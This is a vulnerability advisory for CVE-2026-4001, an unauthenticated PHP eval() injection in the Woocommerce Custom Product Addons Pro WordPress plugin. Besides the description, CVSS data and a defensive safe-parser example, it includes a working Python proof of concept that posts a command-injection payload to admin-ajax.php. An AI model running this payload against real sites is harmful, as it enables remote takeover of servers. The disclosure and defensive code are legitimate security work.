Security Vulnerability Report
CVE-2026-4001 CVSS 9.8 CRITICAL

Published: 2026-03-24 00:16:31
Last Modified: 2026-04-24 16:32:54

Description

The Woocommerce Custom Product Addons Pro plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 5.4.1 via the custom pricing formula eval() in the process_custom_formula() function within includes/process/price.php. This is due to insufficient sanitization and validation of user-submitted field values before passing them to PHP's eval() function. The sanitize_values() method strips HTML tags but does not escape single quotes or prevent PHP code injection. This makes it possible for unauthenticated attackers to execute arbitrary code on the server by submitting a crafted value to a WCPA text field configured with custom pricing formula (pricingType: "custom" with {this.value}).
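One way to remove the eval() pattern described above, as an added example that is not the plugin's own code (the function name wcpa_safe_formula is hypothetical): the formula is parsed by a small recursive-descent evaluator that accepts only numbers, + - * /, parentheses and the {this.value} placeholder, and the submitted field value is checked with is_numeric() and returned by the parser at the placeholder, so it never becomes part of any evaluated text.

```php
<?php
// Added example, not the plugin's code; wcpa_safe_formula is a hypothetical name.
// A value such as "1; system('whoami'); //" fails is_numeric() and is rejected;
// a numeric value is only ever used as a float inside the parser.
function wcpa_safe_formula(string $formula, $userValue): float
{
    if (!is_numeric($userValue)) { throw new InvalidArgumentException('field value must be numeric'); }
    $value = (float) $userValue;
    $pos = 0; $len = strlen($formula);
    $peek = function () use ($formula, &$pos, $len): string {  // next non-space char, not consumed
        while ($pos < $len && $formula[$pos] === ' ') { $pos++; }
        return $pos < $len ? $formula[$pos] : '';
    };
    $parseExpr = $parseFactor = null;
    // factor := number | '{this.value}' | '(' expr ')' | '-' factor
    $parseFactor = function () use ($formula, &$pos, $value, $peek, &$parseExpr, &$parseFactor): float {
        $c = $peek();
        if ($c === '(') {
            $pos++; $v = $parseExpr();
            if ($peek() !== ')') { throw new RuntimeException("expected ')' at offset $pos"); }
            $pos++; return $v;
        }
        if ($c === '-') { $pos++; return -$parseFactor(); }
        if (substr($formula, $pos, 12) === '{this.value}') { $pos += 12; return $value; }
        if (!preg_match('/\G\d+(?:\.\d+)?/', $formula, $m, 0, $pos)) {
            throw new RuntimeException("unexpected token at offset $pos");
        }
        $pos += strlen($m[0]);
        return (float) $m[0];
    };
    // term := factor (('*' | '/') factor)*   (PHP 8 throws DivisionByZeroError on /0)
    $parseTerm = function () use (&$pos, $peek, $parseFactor): float {
        $v = $parseFactor();
        while (($op = $peek()) === '*' || $op === '/') {
            $pos++; $r = $parseFactor(); $v = $op === '*' ? $v * $r : $v / $r;
        }
        return $v;
    };
    // expr := term (('+' | '-') term)*
    $parseExpr = function () use (&$pos, $peek, $parseTerm): float {
        $v = $parseTerm();
        while (($op = $peek()) === '+' || $op === '-') {
            $pos++; $r = $parseTerm(); $v = $op === '+' ? $v + $r : $v - $r;
        }
        return $v;
    };
    $result = $parseExpr();
    if ($peek() !== '') { throw new RuntimeException("trailing input at offset $pos"); }
    return $result;
}
```

With the formula "{this.value} * 2 + 1", a submitted value of "3" yields 7.0, while the PoC payload from this page throws InvalidArgumentException before any evaluation takes place.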

CVSS Details

CVSS Score: 9.8
Severity: CRITICAL
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Weakness: CWE-95 (Improper Neutralization of Directives in Dynamically Evaluated Code, 'Eval Injection')

Configurations (Affected Products)

No configuration data available.

Affected product: Woocommerce Custom Product Addons Pro <= 5.4.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# PoC for CVE-2026-4001: Woocommerce Custom Product Addons Pro RCE
# Description: Exploits eval() injection in custom pricing formula.
# Target: Unauthenticated users submitting to a product with custom pricing.

target_url = "http://example.com/wp-admin/admin-ajax.php"

# The payload injects PHP code. If the formula is '{this.value}',
# injecting '1; phpinfo();' will execute phpinfo().
# If the formula involves math, breaking out with ') or ;' is needed.
payload = "1; system('whoami'); //"

data = {
    "action": "wcpa_calculate_price",
    "product_id": "1",
    "wcpa_field": {
        "value": payload,
        "pricing_type": "custom",
        "formula": "{this.value}"
    }
}

response = requests.post(target_url, json=data)

if response.status_code == 200:
    print("[+] Payload sent. Check response for execution results.")
    print(response.text)
else:
    print("[-] Request failed.")

References

https://acowebs.com/woo-custom-product-addons/
https://www.wordfence.com/threat-intel/vulnerabilities/id/70a2b6ff-defc-4722-9af9-3cae94e98632?source=cve
